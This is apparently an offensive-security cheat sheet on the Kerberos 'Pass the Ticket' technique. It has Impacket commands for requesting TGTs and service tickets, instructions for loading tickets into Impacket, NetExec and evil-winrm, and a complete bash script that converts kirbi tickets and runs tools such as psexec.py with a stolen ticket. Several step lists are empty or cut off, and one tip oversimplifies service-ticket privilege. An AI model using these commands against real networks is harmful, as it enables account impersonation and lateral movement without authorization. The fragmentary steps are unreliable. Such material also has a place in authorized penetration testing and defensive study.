
Pass the Ticket

Pass the Ticket (ccache / kirbi)

Tools: mimikatz, Rubeus, Impacket (getTGT.py, getST.py, ticketConverter.py, secretsdump.py, tgssub.py)

Steps:

1) Request a TGT or a service ticket (ST) for the user

getTGT.py -dc-ip <DC_IP> domain.local/user1:password

getST.py -spn "cifs/target.domain.local" -dc-ip <DC_IP> domain.local/user1:password

2) Use the tickets

Load a Kerberos ticket in .ccache format by pointing KRB5CCNAME at it (getTGT.py / getST.py write the ticket as <user>.ccache in the current directory): export KRB5CCNAME=./ticket.ccache

Globally, all the Impacket tools and the ones built on the library can authenticate via Kerberos with the -k -no-pass command line parameters instead of specifying a password. The target must then be given as a hostname that matches the ticket (not an IP), and -dc-ip can be used if the KDC is not resolvable. For ldeep it's -k.

For NetExec it is -k with credentials to perform the whole Kerberos exchange itself. If a .ccache ticket is already loaded in KRB5CCNAME, it is -k --use-kcache.

Reference: https://hideandsec.sh/link/71#bkmrk-for-evil-winrm-it%27s-

For evil-winrm it's -r <REALM> --spn <SPN_prefix> (default 'HTTP'), with the ticket loaded in KRB5CCNAME. The realm must be declared in the [realms] section of /etc/krb5.conf using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }

If the Kerberos ticket is in .kirbi format (the output of Rubeus or Mimikatz on Windows), it must be converted to .ccache before the Linux tooling can use it. Impacket's ticketConverter.py converts in both directions (ticketConverter.py ticket.kirbi ticket.ccache, or the reverse); the options below cover the other cases:

Convert format (Use this depending on use case)

Convert a Base64 ticket (as printed by Rubeus) to both .ccache and .kirbi: https://github.com/SolomonSklash/RubeusToCcache

1) Rubeus

2) Mimikatz

3) secretsdump

4) impacket tools (Grant System/Admin access)

5) tgssub.py (substitutes the service name / SPN inside an existing service ticket rather than converting its format)
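As an added example that ties steps 1 and 2 together with the format conversion above (this is not code from the original page nor from any of the tools it lists), the bash wrapper below identifies a ticket file by its first bytes (an MIT credential cache starts with 0x05 followed by a version byte 0x01..0x04, a raw .kirbi is a DER KRB-CRED whose [APPLICATION 22] tag is 0x76, and the Base64 form of that always starts with "doI"), converts it to .ccache with Impacket's ticketConverter.py when needed, exports KRB5CCNAME and runs the given Impacket tool with -k -no-pass. It also prints the [realms] stanza evil-winrm needs. Assumptions: ticketConverter.py, base64 and the Impacket tool you name are on PATH; the realm, KDC and target names in the usage comments are placeholders.

```shell
#!/usr/bin/env bash
# Added example: normalise a Kerberos ticket to .ccache and pass it to an
# Impacket tool. ticketConverter.py and the tool are assumed to be on PATH.
set -eu

# Identify a ticket file by its first three bytes:
#   ccache    : 0x05 then version byte 0x01..0x04 (MIT credential cache)
#   kirbi     : 0x76 = DER tag of KRB-CRED, [APPLICATION 22]
#   kirbi-b64 : Base64 text of a kirbi, always begins with "doI" (0x64 0x6f 0x49)
ticket_format() {
    hex=$(head -c 3 "$1" | od -An -tx1 | tr -d ' \n')
    case "$hex" in
        050[1234]*) echo ccache ;;
        76*)        echo kirbi ;;
        646f49*)    echo kirbi-b64 ;;
        *)          echo unknown ;;
    esac
}

# Convert whatever we were given into a .ccache next to it and print its path.
# ticketConverter.py chatter goes to stderr so stdout is only the path.
to_ccache() {
    in=$1
    base=${in%.*}
    case "$(ticket_format "$in")" in
        ccache)
            printf '%s\n' "$in" ;;
        kirbi-b64)
            base64 -d "$in" > "$base.kirbi"
            ticketConverter.py "$base.kirbi" "$base.ccache" >&2
            printf '%s\n' "$base.ccache" ;;
        kirbi)
            ticketConverter.py "$in" "$base.ccache" >&2
            printf '%s\n' "$base.ccache" ;;
        *)
            echo "not a ccache or kirbi ticket: $in" >&2
            return 1 ;;
    esac
}

# Use the ticket: export KRB5CCNAME and run the tool with -k -no-pass.
# The target must be a hostname matching the ticket, not an IP.
# Usage: pass_the_ticket ticket.kirbi psexec.py domain.local/user1@target.domain.local
pass_the_ticket() {
    ticket=$1; shift
    ccache=$(to_ccache "$ticket")
    KRB5CCNAME="$ccache" "$@" -k -no-pass
}

# Emit the [realms] stanza evil-winrm needs in /etc/krb5.conf.
# Kerberos realm names are upper-case, so the realm argument is upper-cased.
# Usage: krb5_realm_stanza contoso.com dc01.contoso.com
krb5_realm_stanza() {
    realm=$(printf '%s' "$1" | tr '[:lower:]' '[:upper:]')
    printf '[realms]\n    %s = {\n        kdc = %s\n    }\n' "$realm" "$2"
}

# Stand-alone use: ./ptt.sh <ticket file> <impacket tool> <tool arguments...>
if [ "$#" -ge 2 ]; then
    pass_the_ticket "$@"
fi
```

The format check is worth keeping even outside the wrapper: a ticket that Rubeus dumped as Base64 and was pasted into a file is the usual reason ticketConverter.py or an Impacket tool rejects "ticket.kirbi", and the first three bytes tell you which conversion step you skipped.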

Modify SPN (change the service name inside an existing service ticket so it is accepted by another service on the same host)

Tool: Mimikatz

OR

1)

2)

3)

TIP: a TGT is worth as much as the user's credentials: with it you can request a service ticket for any service that user is allowed to access, so a TGT of a privileged account is effectively admin access.

A service ticket (TGS) is limited to the single SPN it was issued for, so it behaves like a low-privileged, single-purpose credential.

Alternate Method: Rubeus (on Windows, Rubeus asktgt ... /ptt requests a TGT and injects it into the current logon session; Rubeus ptt /ticket:<base64 kirbi> injects an existing ticket)
